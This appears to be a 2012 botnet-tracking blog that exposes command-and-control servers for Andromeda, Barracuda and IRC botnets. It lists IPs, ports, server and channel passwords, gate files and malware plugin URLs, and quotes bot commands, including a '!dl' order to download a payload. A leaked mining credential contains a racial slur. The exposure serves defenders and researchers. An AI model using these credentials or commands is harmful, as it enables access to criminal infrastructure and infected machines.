Resolved i.greenleafyplants.info to 37.221.170.211
Server: i.greenleafyplants.info
Port: 15001
Server password: 69
Channel: #A
Channel password: t
Nick format: _[USA|U|L|WIN7|x64|4c]alcaiwfs
Oper: _
[_] (u@v.Host): …
[_] @#A
[_] irc.server.net :IRC server
[_] is a Bot on IRC server
[_] idle 01:22:14, signon: Sun Dec 02 05:45:11
[_] End of WHOIS list.
His debug bot: n[USA|U|D|WIN7|x64|4c]xqftcbqi
w4hw5wg3488h.net (snk asper mod IRC botnet hosted by Germany Karlsruhe 1&1 Internet Ag)
Resolved w4hw5wg3488h.net to 213.165.89.117
Server: w4hw5wg3488h.net
Port: 5050
Channel: #oh
Topic for #oh is: .d /100/97/111/124/120/46/47/39/99/103/96/69/126/115/101/62/113/111/115/62/100/124/57/61/39/57/60/23/40/61/47/33/12/63/52/35/42/41/17/103/8/85/63/104/127/118/39/98/107/73/77/
Topic for #oh set by s at Sat Dec 01 18:36:05 2012
Oper: s!x@x
Talking with snk
<Userbased> hey
<s> sup
<Userbased> cool ircd mod
<s> yea
<Userbased> I like the link encryption as well
<Userbased> is this an...
new.najd.us (IRC botnet hosted by Finland Espoo Csc – Tieteen Tietotekniikan Keskus Oy)
Resolved new.najd.us to 193.166.255.170
Server: new.najd.us
Port: 7000
Server password: hipass
Nick format: yhrhjz
I don’t know the channels as I don’t have the binary.
Hosting info: http://whois.domaintools.com/193.166.255.170
dinosaur.no-ip.org (Andromeda and Barracuda HTTP botnets hosted by Russian Federation Moscow Pallada Web Service Llc)
Resolved dinosaur.no-ip.org to 37.0.123.119
I’ve been watching the Barracuda for a while, and when I saw it load the Andromeda I decided to post them both.
Andromeda
Server: dinosaur.no-ip.org
Gate file: /andr/image.php
Plugins
Rootkit: dinosaur.no-ip.org/andr/r.pack
Socks: dinosaur.no-ip.org/andr/s.pack
Formgrabber: dinosaur.no-ip.org/andr/f.pack
Gate file: dinosaur.no-ip.org/andr/fg.php
Barracuda HTTP
Server: dinosaur.no-ip.org
Gate file: dinosaur.no-ip.org/drgordon512/bot.php
Here are some...
freshairhosting.nl (Andromeda HTTP botnet hosted by Thailand Bangkok Metrabyte Th)
Resolved freshairhosting.nl to 119.59.99.200
When will these skids finally get tired of Andromeda?
Server: freshairhosting.nl
Gate file: image.php
Hosting info: http://whois.domaintools.com/119.59.99.200
213.165.89.117 (IRC botnet hosted by Germany Karlsruhe 1&1 Internet Ag)
Server: 213.165.89.117
Port: 5050
Channel: #kos
Nick format: [USA|XP]hjktjel
This is snk’s asper mod again.
Hosting info: http://whois.domaintools.com/213.165.89.117
37.221.163.175 (Andromeda HTTP botnet hosted by Romania Voxility S.r.l.)
The laziest skids don’t even bother getting a domain at all. Why hello Nicolas Moses. What do you have for us today? It’s Andromeda again, this time hosted on a Windows VPS.
Server: 37.221.163.175
Gate file: /andro/image.php
EDIT: Oh hey, bitcoin mining. Glad to see you’re still keeping the same old password.
daily500:nigger123456@pool.bitclockers.com:8332
Also a...
uberchat.no-ip.biz (Andromeda HTTP botnet hosted by Romania Voxility S.r.l.)
Resolved uberchat.no-ip.biz to 37.221.160.124
Yet another cracked Andromeda. Skids don’t even bother to get a real domain for it.
Server: uberchat.no-ip.biz
Gate file: /chat/image.php
Clicking on adf.ly links, someone’s clearly trying to make some big bucks.
    public void adfly()
    {
        this.WebBrowser1.Navigate("http://adf.ly/FHZcZ");
    }
Hosting info: http://whois.domaintools.com/37.221.160.124
keep.hustling4life.biz (Bitcoin mining pool for botnet)
Resolved keep.hustling4life.biz to 195.190.13.138, 46.17.92.158, 213.165.85.165
Someone is trying to get some mining done before the mining reward drops I guess. The file is from an already posted botnet.
* Topic for #mr is: !dl hxxp://213.165.85.165:8081/udhsdfka.png
* Topic for #mr set by test at Mon Nov 26 04:52:40 2012
Server: keep.hustling4life.biz
Port: 2142
Mining information:
46.166.139.177 (Andromeda HTTP botnet hosted by Italy Florence Santrex Internet Services Ltd.)
Server: 46.166.139.177
Gate file: /Panel/image.php
Plugins
Rootkit: 46.166.139.177/Panel/r.pack
Formgrabber: 46.166.139.177/Panel/f.pack
Gate file: fg.php
Hosting info: http://whois.domaintools.com/46.166.139.177